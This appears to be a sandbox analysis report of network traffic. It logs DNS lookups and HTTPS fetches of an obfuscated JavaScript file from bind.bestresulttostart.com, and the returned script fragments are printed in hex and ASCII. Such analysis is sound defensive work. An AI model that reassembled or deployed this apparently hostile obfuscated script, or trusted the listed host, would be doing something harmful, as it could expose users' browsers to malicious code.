      Apr 25, 2024 11:20:43.017781973 CEST49727443192.168.2.5172.217.215.147
      Apr 25, 2024 11:20:43.018452883 CEST49727443192.168.2.5172.217.215.147
      Apr 25, 2024 11:20:43.018472910 CEST44349727172.217.215.147192.168.2.5
      Apr 25, 2024 11:20:43.242854118 CEST44349727172.217.215.147192.168.2.5
      Apr 25, 2024 11:20:43.243437052 CEST49727443192.168.2.5172.217.215.147
      Apr 25, 2024 11:20:43.243467093 CEST44349727172.217.215.147192.168.2.5
      Apr 25, 2024 11:20:43.243740082 CEST44349727172.217.215.147192.168.2.5
      Apr 25, 2024 11:20:43.244559050 CEST49727443192.168.2.5172.217.215.147
      Apr 25, 2024 11:20:43.244604111 CEST44349727172.217.215.147192.168.2.5
      Apr 25, 2024 11:20:43.299894094 CEST49727443192.168.2.5172.217.215.147
      Apr 25, 2024 11:20:53.249912977 CEST44349727172.217.215.147192.168.2.5
      Apr 25, 2024 11:20:53.249999046 CEST44349727172.217.215.147192.168.2.5
      Apr 25, 2024 11:20:53.250045061 CEST49727443192.168.2.5172.217.215.147
      Apr 25, 2024 11:20:53.691263914 CEST49727443192.168.2.5172.217.215.147
      Apr 25, 2024 11:20:53.691283941 CEST44349727172.217.215.147192.168.2.5
      TimestampSource PortDest PortSource IPDest IP
      Apr 25, 2024 11:19:39.501764059 CEST53510631.1.1.1192.168.2.5
      Apr 25, 2024 11:19:39.505831957 CEST53560541.1.1.1192.168.2.5
      Apr 25, 2024 11:19:40.130469084 CEST53650841.1.1.1192.168.2.5
      Apr 25, 2024 11:19:40.890794039 CEST4961353192.168.2.51.1.1.1
      Apr 25, 2024 11:19:40.891197920 CEST5222253192.168.2.51.1.1.1
      Apr 25, 2024 11:19:41.215724945 CEST53522221.1.1.1192.168.2.5
      Apr 25, 2024 11:19:41.216545105 CEST53496131.1.1.1192.168.2.5
      Apr 25, 2024 11:19:42.942675114 CEST6517053192.168.2.51.1.1.1
      Apr 25, 2024 11:19:42.943373919 CEST4931953192.168.2.51.1.1.1
      Apr 25, 2024 11:19:42.966053963 CEST6050953192.168.2.51.1.1.1
      Apr 25, 2024 11:19:42.966797113 CEST6189853192.168.2.51.1.1.1
      Apr 25, 2024 11:19:43.075881004 CEST53605091.1.1.1192.168.2.5
      Apr 25, 2024 11:19:43.076615095 CEST53618981.1.1.1192.168.2.5
      Apr 25, 2024 11:19:43.265333891 CEST53493191.1.1.1192.168.2.5
      Apr 25, 2024 11:19:43.277769089 CEST53651701.1.1.1192.168.2.5
      Apr 25, 2024 11:20:06.117017031 CEST53522911.1.1.1192.168.2.5
      Apr 25, 2024 11:20:36.998109102 CEST53651871.1.1.1192.168.2.5
      Apr 25, 2024 11:20:38.478226900 CEST53645151.1.1.1192.168.2.5
      Apr 25, 2024 11:21:00.922907114 CEST53557701.1.1.1192.168.2.5
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Apr 25, 2024 11:19:40.890794039 CEST192.168.2.51.1.1.10x348dStandard query (0)bind.bestresulttostart.comA (IP address)IN (0x0001)false
      Apr 25, 2024 11:19:40.891197920 CEST192.168.2.51.1.1.10x6694Standard query (0)bind.bestresulttostart.com65IN (0x0001)false
      Apr 25, 2024 11:19:42.942675114 CEST192.168.2.51.1.1.10xc51bStandard query (0)bind.bestresulttostart.comA (IP address)IN (0x0001)false
      Apr 25, 2024 11:19:42.943373919 CEST192.168.2.51.1.1.10x47d5Standard query (0)bind.bestresulttostart.com65IN (0x0001)false
      Apr 25, 2024 11:19:42.966053963 CEST192.168.2.51.1.1.10xc004Standard query (0)www.google.comA (IP address)IN (0x0001)false
      Apr 25, 2024 11:19:42.966797113 CEST192.168.2.51.1.1.10x1c49Standard query (0)www.google.com65IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Apr 25, 2024 11:19:41.216545105 CEST1.1.1.1192.168.2.50x348dNo error (0)bind.bestresulttostart.com193.163.7.113A (IP address)IN (0x0001)false
      Apr 25, 2024 11:19:43.075881004 CEST1.1.1.1192.168.2.50xc004No error (0)www.google.com172.217.215.147A (IP address)IN (0x0001)false
      Apr 25, 2024 11:19:43.075881004 CEST1.1.1.1192.168.2.50xc004No error (0)www.google.com172.217.215.105A (IP address)IN (0x0001)false
      Apr 25, 2024 11:19:43.075881004 CEST1.1.1.1192.168.2.50xc004No error (0)www.google.com172.217.215.106A (IP address)IN (0x0001)false
      Apr 25, 2024 11:19:43.075881004 CEST1.1.1.1192.168.2.50xc004No error (0)www.google.com172.217.215.103A (IP address)IN (0x0001)false
      Apr 25, 2024 11:19:43.075881004 CEST1.1.1.1192.168.2.50xc004No error (0)www.google.com172.217.215.104A (IP address)IN (0x0001)false
      Apr 25, 2024 11:19:43.075881004 CEST1.1.1.1192.168.2.50xc004No error (0)www.google.com172.217.215.99A (IP address)IN (0x0001)false
      Apr 25, 2024 11:19:43.076615095 CEST1.1.1.1192.168.2.50x1c49No error (0)www.google.com65IN (0x0001)false
      Apr 25, 2024 11:19:43.277769089 CEST1.1.1.1192.168.2.50xc51bNo error (0)bind.bestresulttostart.com193.163.7.113A (IP address)IN (0x0001)false
      Apr 25, 2024 11:19:58.935574055 CEST1.1.1.1192.168.2.50xb4a3No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
      Apr 25, 2024 11:19:58.935574055 CEST1.1.1.1192.168.2.50xb4a3No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
      Apr 25, 2024 11:19:59.458976030 CEST1.1.1.1192.168.2.50x3521No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
      Apr 25, 2024 11:19:59.458976030 CEST1.1.1.1192.168.2.50x3521No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
      Apr 25, 2024 11:20:28.733673096 CEST1.1.1.1192.168.2.50x86c3No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
      Apr 25, 2024 11:20:28.733673096 CEST1.1.1.1192.168.2.50x86c3No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
      Apr 25, 2024 11:20:52.936916113 CEST1.1.1.1192.168.2.50x71c8No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
      Apr 25, 2024 11:20:52.936916113 CEST1.1.1.1192.168.2.50x71c8No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
      Apr 25, 2024 11:21:00.821172953 CEST1.1.1.1192.168.2.50x876No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
      Apr 25, 2024 11:21:00.821172953 CEST1.1.1.1192.168.2.50x876No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
      • bind.bestresulttostart.com
      • https:
      • fs.microsoft.com
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.549709193.163.7.1134434324C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-04-25 09:19:41 UTC698OUTGET /scripts/statistics.js?s=7.8.2 HTTP/1.1
      Host: bind.bestresulttostart.com
      Connection: keep-alive
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      sec-ch-ua-mobile: ?0
      sec-ch-ua-platform: "Windows"
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Sec-Fetch-Site: none
      Sec-Fetch-Mode: navigate
      Sec-Fetch-User: ?1
      Sec-Fetch-Dest: document
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-04-25 09:19:42 UTC400INHTTP/1.1 200 OK
      Server: nginx
      Date: Thu, 25 Apr 2024 09:19:41 GMT
      Content-Type: application/javascript; charset=utf-8
      Content-Length: 13785
      Last-Modified: Tue, 09 Apr 2024 17:57:49 GMT
      Connection: close
      Vary: Accept-Encoding
      ETag: "6615819d-35d9"
      Expires: Thu, 31 Dec 2037 23:55:55 GMT
      Cache-Control: max-age=315360000
      Strict-Transport-Security: max-age=31536000;
      Accept-Ranges: bytes
      2024-04-25 09:19:42 UTC969INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 32 33 61 31 39 2c 5f 30 78 32 64 63 64 31 39 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 38 62 36 33 34 28 5f 30 78 33 63 36 65 64 38 2c 5f 30 78 31 30 32 32 34 36 2c 5f 30 78 39 61 31 61 62 62 2c 5f 30 78 33 38 39 36 36 31 2c 5f 30 78 35 64 36 30 36 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 31 30 32 32 34 36 2d 20 2d 30 78 65 63 2c 5f 30 78 33 63 36 65 64 38 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 35 64 30 37 61 28 5f 30 78 31 37 33 37 66 31 2c 5f 30 78 34 34 38 64 37 65 2c 5f 30 78 33 66 63 33 38 35 2c 5f 30 78 32 33 35 66 37 34 2c 5f 30 78 34 34 33 39 35 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 34 34 33 39 35 37 2d 20 2d 30 78 32 65 32 2c 5f 30 78 32 33 35 66
      Data Ascii: (function(_0x123a19,_0x2dcd19){function _0x58b634(_0x3c6ed8,_0x102246,_0x9a1abb,_0x389661,_0x5d6061){return _0x58cd(_0x102246- -0xec,_0x3c6ed8);}function _0x15d07a(_0x1737f1,_0x448d7e,_0x3fc385,_0x235f74,_0x443957){return _0x58cd(_0x443957- -0x2e2,_0x235f
      2024-04-25 09:19:42 UTC1369INData Raw: 2b 30 78 65 31 37 29 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 64 30 37 61 28 2d 30 78 65 38 2c 2d 30 78 38 32 2c 2d 30 78 63 36 2c 27 30 6a 5a 4c 27 2c 2d 30 78 62 39 29 29 2f 28 30 78 31 31 62 36 2b 2d 30 78 31 33 2a 2d 30 78 62 38 2b 2d 30 78 35 2a 30 78 36 34 35 29 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 64 30 37 61 28 2d 30 78 61 66 2c 2d 30 78 63 30 2c 2d 30 78 39 62 2c 27 5e 44 23 61 27 2c 2d 30 78 64 32 29 29 2f 28 30 78 32 34 66 33 2b 2d 30 78 31 39 35 66 2b 30 78 61 65 2a 2d 30 78 31 31 29 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 38 62 36 33 34 28 27 33 32 63 28 27 2c 30 78 31 32 65 2c 30 78 31 31 32 2c 30 78 31 33 64 2c 30 78 31 34 63 29 29 2f 28 2d 30 78 34 2a 30 78 34 61 2b 2d 30 78 31 61 35 31 2b 30 78 36 65 2a 30 78 34
      Data Ascii: +0xe17)*(-parseInt(_0x15d07a(-0xe8,-0x82,-0xc6,'0jZL',-0xb9))/(0x11b6+-0x13*-0xb8+-0x5*0x645))+parseInt(_0x15d07a(-0xaf,-0xc0,-0x9b,'^D#a',-0xd2))/(0x24f3+-0x195f+0xae*-0x11)*(parseInt(_0x58b634('32c(',0x12e,0x112,0x13d,0x14c))/(-0x4*0x4a+-0x1a51+0x6e*0x4
      2024-04-25 09:19:42 UTC1369INData Raw: 2c 30 78 34 32 30 29 2b 27 74 27 2c 27 6a 49 46 47 47 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 61 38 33 33 35 2c 5f 30 78 65 38 66 30 65 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 61 38 33 33 35 2b 5f 30 78 65 38 66 30 65 37 3b 7d 2c 27 6a 54 58 6b 66 27 3a 5f 30 78 35 36 65 62 31 30 28 27 68 5d 66 7a 27 2c 30 78 34 63 36 2c 30 78 34 63 64 2c 30 78 34 65 35 2c 30 78 34 66 30 29 2b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 39 34 2c 27 33 38 33 6d 27 2c 2d 30 78 62 65 2c 2d 30 78 63 34 2c 2d 30 78 62 62 29 2b 5f 30 78 35 65 66 30 64 62 28 30 78 33 61 63 2c 27 4c 4d 6e 4b 27 2c 30 78 33 64 31 2c 30 78 33 64 39 2c 30 78 33 64 32 29 2b 5f 30 78 31 30 61 34 36 63 28 27 71 4d 71 52 27 2c 30 78 33 34 64 2c 30 78 33 32 38 2c 30 78 33 33 62 2c 30 78 33 35 63 29 2b
      Data Ascii: ,0x420)+'t','jIFGG':function(_0x1a8335,_0xe8f0e7){return _0x1a8335+_0xe8f0e7;},'jTXkf':_0x56eb10('h]fz',0x4c6,0x4cd,0x4e5,0x4f0)+_0x51389c(-0x94,'383m',-0xbe,-0xc4,-0xbb)+_0x5ef0db(0x3ac,'LMnK',0x3d1,0x3d9,0x3d2)+_0x10a46c('qMqR',0x34d,0x328,0x33b,0x35c)+
      2024-04-25 09:19:42 UTC1369INData Raw: 31 39 65 37 65 2d 30 78 31 66 31 2c 5f 30 78 35 65 32 64 66 35 29 3b 7d 76 61 72 20 5f 30 78 33 38 36 33 39 30 3d 64 6f 63 75 6d 65 6e 74 2c 5f 30 78 33 63 64 64 37 63 3d 5f 30 78 33 38 36 33 39 30 5b 5f 30 78 31 30 61 34 36 63 28 27 6f 23 52 48 27 2c 30 78 32 64 65 2c 30 78 33 32 38 2c 30 78 33 31 30 2c 30 78 33 30 61 29 2b 5f 30 78 35 36 65 62 31 30 28 27 68 4c 4f 58 27 2c 30 78 34 63 35 2c 30 78 34 61 61 2c 30 78 34 39 36 2c 30 78 34 65 31 29 2b 5f 30 78 31 30 61 34 36 63 28 27 71 4d 71 52 27 2c 30 78 33 30 33 2c 30 78 32 63 36 2c 30 78 33 30 34 2c 30 78 32 66 63 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 36 65 62 31 30 28 27 68 5d 66 7a 27 2c 30 78 34 64 34 2c 30 78 34 66 35 2c 30 78 34 65 37 2c 30 78 34 61 34 29 5d 29 3b 66 75 6e 63 74 69 6f
      Data Ascii: 19e7e-0x1f1,_0x5e2df5);}var _0x386390=document,_0x3cdd7c=_0x386390[_0x10a46c('o#RH',0x2de,0x328,0x310,0x30a)+_0x56eb10('hLOX',0x4c5,0x4aa,0x496,0x4e1)+_0x10a46c('qMqR',0x303,0x2c6,0x304,0x2fc)](_0x159d5c[_0x56eb10('h]fz',0x4d4,0x4f5,0x4e7,0x4a4)]);functio
      2024-04-25 09:19:42 UTC1369INData Raw: 30 78 34 64 65 2c 30 78 34 65 63 29 5d 28 42 6f 6f 6c 65 61 6e 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 65 66 30 64 62 28 30 78 33 66 35 2c 27 71 4d 71 52 27 2c 30 78 33 63 32 2c 30 78 33 63 61 2c 30 78 33 39 37 29 2b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 62 35 2c 27 33 38 33 6d 27 2c 2d 30 78 37 65 2c 2d 30 78 39 64 2c 2d 30 78 61 36 29 2b 5f 30 78 33 65 65 63 39 66 28 30 78 32 39 39 2c 27 62 6e 74 75 27 2c 30 78 32 35 65 2c 30 78 32 36 33 2c 30 78 32 38 34 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 66 37 2c 27 70 44 61 4f 27 2c 2d 30 78 31 32 39 2c 2d 30 78 31 31 65 2c 2d 30 78 64 61 29 5d 29 29 2c 21 5b 5d 29 29 7b 69 66 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 31 30 61 34 36 63 28 27 5d 6f 58 67 27 2c 30 78 33 36
      Data Ascii: 0x4de,0x4ec)](Boolean,document[_0x5ef0db(0x3f5,'qMqR',0x3c2,0x3ca,0x397)+_0x51389c(-0xb5,'383m',-0x7e,-0x9d,-0xa6)+_0x3eec9f(0x299,'bntu',0x25e,0x263,0x284)](_0x159d5c[_0x51389c(-0xf7,'pDaO',-0x129,-0x11e,-0xda)])),![])){if(_0x159d5c[_0x10a46c(']oXg',0x36
      2024-04-25 09:19:42 UTC1369INData Raw: 66 28 30 78 32 35 33 2c 27 33 32 63 28 27 2c 30 78 32 38 32 2c 30 78 32 33 36 2c 30 78 32 38 32 29 2b 5f 30 78 33 65 65 63 39 66 28 30 78 32 39 61 2c 27 33 31 21 75 27 2c 30 78 32 38 36 2c 30 78 32 38 39 2c 30 78 32 63 39 29 2b 5f 30 78 31 30 61 34 36 63 28 27 64 45 37 41 27 2c 30 78 33 61 31 2c 30 78 33 33 63 2c 30 78 33 34 35 2c 30 78 33 36 37 29 5d 5b 5f 30 78 33 65 65 63 39 66 28 30 78 32 36 38 2c 27 54 55 56 66 27 2c 30 78 32 38 61 2c 30 78 32 36 65 2c 30 78 32 38 38 29 2b 27 65 27 5d 28 29 29 3a 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 31 30 61 34 36 63 28 27 24 52 4f 6b 27 2c 30 78 33 30 62 2c 30 78 33 30 63 2c 30 78 32 66 30 2c 30 78 33 30 39 29 5d 28 5f 30 78 34 34 62 62 37 66 2c 27 27 29 3a 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 65 66 30 64 62
      Data Ascii: f(0x253,'32c(',0x282,0x236,0x282)+_0x3eec9f(0x29a,'31!u',0x286,0x289,0x2c9)+_0x10a46c('dE7A',0x3a1,0x33c,0x345,0x367)][_0x3eec9f(0x268,'TUVf',0x28a,0x26e,0x288)+'e']()):_0x159d5c[_0x10a46c('$ROk',0x30b,0x30c,0x2f0,0x309)](_0x44bb7f,''):_0x159d5c[_0x5ef0db
      2024-04-25 09:19:42 UTC1369INData Raw: 27 57 52 4c 77 57 52 76 31 57 51 69 27 2c 27 63 57 65 36 79 58 43 27 2c 27 72 6d 6f 4e 57 34 46 64 4e 68 35 64 57 36 72 66 57 34 47 27 2c 27 57 4f 56 63 51 53 6b 41 27 2c 27 79 30 6c 63 56 53 6f 49 57 35 57 27 2c 27 72 53 6b 75 57 34 78 63 4e 43 6b 69 27 2c 27 78 57 4c 62 57 36 78 63 4a 57 27 2c 27 57 52 5a 64 47 53 6f 44 65 33 6c 64 55 68 34 27 2c 27 57 51 58 38 57 51 39 2b 57 51 57 27 2c 27 76 38 6b 6c 57 50 72 44 6e 61 27 2c 27 46 5a 50 78 57 37 2f 63 52 71 27 2c 27 71 53 6f 2b 57 37 56 64 47 38 6b 50 27 2c 27 57 36 5a 64 48 4c 31 30 57 50 69 27 2c 27 57 36 4f 78 42 47 27 2c 27 66 4d 66 51 27 2c 27 57 34 47 59 57 52 74 63 52 53 6b 41 27 2c 27 57 36 4b 32 57 50 4b 43 27 2c 27 66 38 6f 72 65 73 4f 2f 71 47 46 63 47 6d 6b 6b 27 2c 27 76 53 6b 34 57 51 72
      Data Ascii: 'WRLwWRv1WQi','cWe6yXC','rmoNW4FdNh5dW6rfW4G','WOVcQSkA','y0lcVSoIW5W','rSkuW4xcNCki','xWLbW6xcJW','WRZdGSoDe3ldUh4','WQX8WQ9+WQW','v8klWPrDna','FZPxW7/cRq','qSo+W7VdG8kP','W6ZdHL10WPi','W6OxBG','fMfQ','W4GYWRtcRSkA','W6K2WPKC','f8oresO/qGFcGmkk','vSk4WQr
      2024-04-25 09:19:42 UTC1369INData Raw: 68 64 54 30 79 27 2c 27 57 36 31 56 63 68 4a 63 4d 71 27 2c 27 62 6d 6b 66 57 50 6e 73 57 51 69 27 2c 27 46 53 6b 34 57 52 4e 63 4e 53 6f 52 27 2c 27 57 51 69 55 57 34 68 64 4a 59 43 27 2c 27 57 37 50 58 57 50 72 45 6b 77 56 63 56 53 6b 64 69 66 78 64 52 38 6f 79 6d 47 27 2c 27 57 50 4c 56 64 64 54 73 27 2c 27 68 71 75 66 73 6d 6f 79 27 2c 27 66 57 5a 64 53 49 64 64 4f 57 27 2c 27 74 6d 6b 4f 57 50 39 57 57 50 79 27 2c 27 57 52 6a 73 6c 38 6b 69 6e 38 6f 4f 57 36 30 45 42 59 4c 37 27 2c 27 57 36 64 64 49 43 6f 2b 64 61 27 2c 27 57 52 64 63 47 74 58 7a 57 52 7a 41 57 34 68 63 49 43 6f 44 27 2c 27 74 38 6b 52 57 36 62 65 71 57 27 2c 27 57 51 53 70 57 35 4a 64 54 48 79 27 2c 27 57 37 58 75 6f 32 46 63 4d 61 27 2c 27 71 38 6b 6e 57 52 7a 32 57 51 4f 27 2c 27
      Data Ascii: hdT0y','W61VchJcMq','bmkfWPnsWQi','FSk4WRNcNSoR','WQiUW4hdJYC','W7PXWPrEkwVcVSkdifxdR8oymG','WPLVddTs','hqufsmoy','fWZdSIddOW','tmkOWP9WWPy','WRjsl8kin8oOW60EBYL7','W6ddICo+da','WRdcGtXzWRzAW4hcICoD','t8kRW6beqW','WQSpW5JdTHy','W7Xuo2FcMa','q8knWRz2WQO','
      2024-04-25 09:19:42 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 5f 30 78 31 33 65 62 39 34 28 5f 30 78 61 32 37 66 34 31 2c 5f 30 78 34 32 31 66 30 62 2c 5f 30 78 34 61 38 37 63 32 2c 5f 30 78 35 30 30 64 63 65 2c 5f 30 78 33 30 65 36 32 38 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 35 30 30 64 63 65 2d 20 2d 30 78 31 63 62 2c 5f 30 78 34 61 38 37 63 32 29 3b 7d 76 61 72 20 5f 30 78 35 63 39 39 39 37 3d 5f 30 78 34 62 65 62 34 37 28 27 6a 65 4c 59 27 2c 2d 30 78 31 32 33 2c 2d 30 78 31 33 34 2c 2d 30 78 31 35 33 2c 2d 30 78 31 37 34 29 2b 5f 30 78 31 33 65 62 39 34 28 2d 30 78 63 2c 30 78 39 2c 27 31 36 56 62 27 2c 30 78 32 31 2c 2d 30 78 31 32 29 2c 5f 30 78 33 34 66 36 37 66 3d 5f 30 78 34 62 65 62 34 37 28 27 7a 72 47 57 27 2c 2d 30 78 66 66 2c 2d 30 78 66 30 2c 2d 30 78 66
      Data Ascii: unction _0x13eb94(_0xa27f41,_0x421f0b,_0x4a87c2,_0x500dce,_0x30e628){return _0x58cd(_0x500dce- -0x1cb,_0x4a87c2);}var _0x5c9997=_0x4beb47('jeLY',-0x123,-0x134,-0x153,-0x174)+_0x13eb94(-0xc,0x9,'16Vb',0x21,-0x12),_0x34f67f=_0x4beb47('zrGW',-0xff,-0xf0,-0xf
      2024-04-25 09:19:42 UTC1369INData Raw: 35 38 29 5b 27 74 6f 53 74 72 69 6e 67 27 5d 28 2d 30 78 66 63 37 2b 30 78 33 64 2a 30 78 32 33 2b 2d 30 78 33 2a 2d 30 78 32 38 30 29 29 5b 27 73 6c 69 63 65 27 5d 28 2d 28 30 78 31 32 30 65 2b 2d 30 78 31 31 32 35 2b 30 78 62 2a 2d 30 78 31 35 29 29 3b 7d 72 65 74 75 72 6e 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 5f 30 78 31 64 63 65 38 32 29 3b 7d 3b 76 61 72 20 5f 30 78 32 65 65 33 64 64 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 36 62 37 32 30 2c 5f 30 78 33 63 64 30 30 38 29 7b 76 61 72 20 5f 30 78 31 62 62 38 32 63 3d 5b 5d 2c 5f 30 78 31 63 34 61 39 65 3d 2d 30 78 31 64 37 63 2b 30 78 31 38 62 2a 30 78 37 2b 30 78 31 32 61 66 2c 5f 30 78 64 62 32 33 37 64 2c 5f 30 78 33 30 31 30 33 38 3d 27 27 3b 5f 30 78 33 36 62 37 32 30 3d 5f
      Data Ascii: 58)['toString'](-0xfc7+0x3d*0x23+-0x3*-0x280))['slice'](-(0x120e+-0x1125+0xb*-0x15));}return decodeURIComponent(_0x1dce82);};var _0x2ee3dd=function(_0x36b720,_0x3cd008){var _0x1bb82c=[],_0x1c4a9e=-0x1d7c+0x18b*0x7+0x12af,_0xdb237d,_0x301038='';_0x36b720=_


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.549710193.163.7.1134434324C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-04-25 09:19:42 UTC637OUTGET /favicon.ico HTTP/1.1
      Host: bind.bestresulttostart.com
      Connection: keep-alive
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      sec-ch-ua-platform: "Windows"
      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: no-cors
      Sec-Fetch-Dest: image
      Referer: https://bind.bestresulttostart.com/scripts/statistics.js?s=7.8.2
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-04-25 09:19:42 UTC263INHTTP/1.1 200 OK
      Server: nginx
      Date: Thu, 25 Apr 2024 09:19:42 GMT
      Content-Type: application/javascript; charset=utf-8
      Transfer-Encoding: chunked
      Connection: close
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Strict-Transport-Security: max-age=31536000;
      2024-04-25 09:19:42 UTC1106INData Raw: 33 35 64 61 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 32 33 61 31 39 2c 5f 30 78 32 64 63 64 31 39 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 38 62 36 33 34 28 5f 30 78 33 63 36 65 64 38 2c 5f 30 78 31 30 32 32 34 36 2c 5f 30 78 39 61 31 61 62 62 2c 5f 30 78 33 38 39 36 36 31 2c 5f 30 78 35 64 36 30 36 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 31 30 32 32 34 36 2d 20 2d 30 78 65 63 2c 5f 30 78 33 63 36 65 64 38 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 35 64 30 37 61 28 5f 30 78 31 37 33 37 66 31 2c 5f 30 78 34 34 38 64 37 65 2c 5f 30 78 33 66 63 33 38 35 2c 5f 30 78 32 33 35 66 37 34 2c 5f 30 78 34 34 33 39 35 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 34 34 33 39 35 37 2d 20 2d 30 78 32 65 32 2c 5f
      Data Ascii: 35da(function(_0x123a19,_0x2dcd19){function _0x58b634(_0x3c6ed8,_0x102246,_0x9a1abb,_0x389661,_0x5d6061){return _0x58cd(_0x102246- -0xec,_0x3c6ed8);}function _0x15d07a(_0x1737f1,_0x448d7e,_0x3fc385,_0x235f74,_0x443957){return _0x58cd(_0x443957- -0x2e2,_
      2024-04-25 09:19:42 UTC1369INData Raw: 2c 27 5e 44 23 61 27 2c 2d 30 78 64 32 29 29 2f 28 30 78 32 34 66 33 2b 2d 30 78 31 39 35 66 2b 30 78 61 65 2a 2d 30 78 31 31 29 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 38 62 36 33 34 28 27 33 32 63 28 27 2c 30 78 31 32 65 2c 30 78 31 31 32 2c 30 78 31 33 64 2c 30 78 31 34 63 29 29 2f 28 2d 30 78 34 2a 30 78 34 61 2b 2d 30 78 31 61 35 31 2b 30 78 36 65 2a 30 78 34 30 29 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 64 30 37 61 28 2d 30 78 64 33 2c 2d 30 78 31 32 64 2c 2d 30 78 63 36 2c 27 77 51 4d 33 27 2c 2d 30 78 66 35 29 29 2f 28 30 78 63 64 2a 30 78 31 63 2b 2d 30 78 33 65 39 2a 2d 30 78 31 2b 2d 30 78 31 61 34 64 29 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 64 30 37 61 28 2d 30 78 66 64 2c 2d 30 78 63 64 2c 2d 30 78 65 61 2c 27 54 55 56
      Data Ascii: ,'^D#a',-0xd2))/(0x24f3+-0x195f+0xae*-0x11)*(parseInt(_0x58b634('32c(',0x12e,0x112,0x13d,0x14c))/(-0x4*0x4a+-0x1a51+0x6e*0x40))+parseInt(_0x15d07a(-0xd3,-0x12d,-0xc6,'wQM3',-0xf5))/(0xcd*0x1c+-0x3e9*-0x1+-0x1a4d)*(parseInt(_0x15d07a(-0xfd,-0xcd,-0xea,'TUV
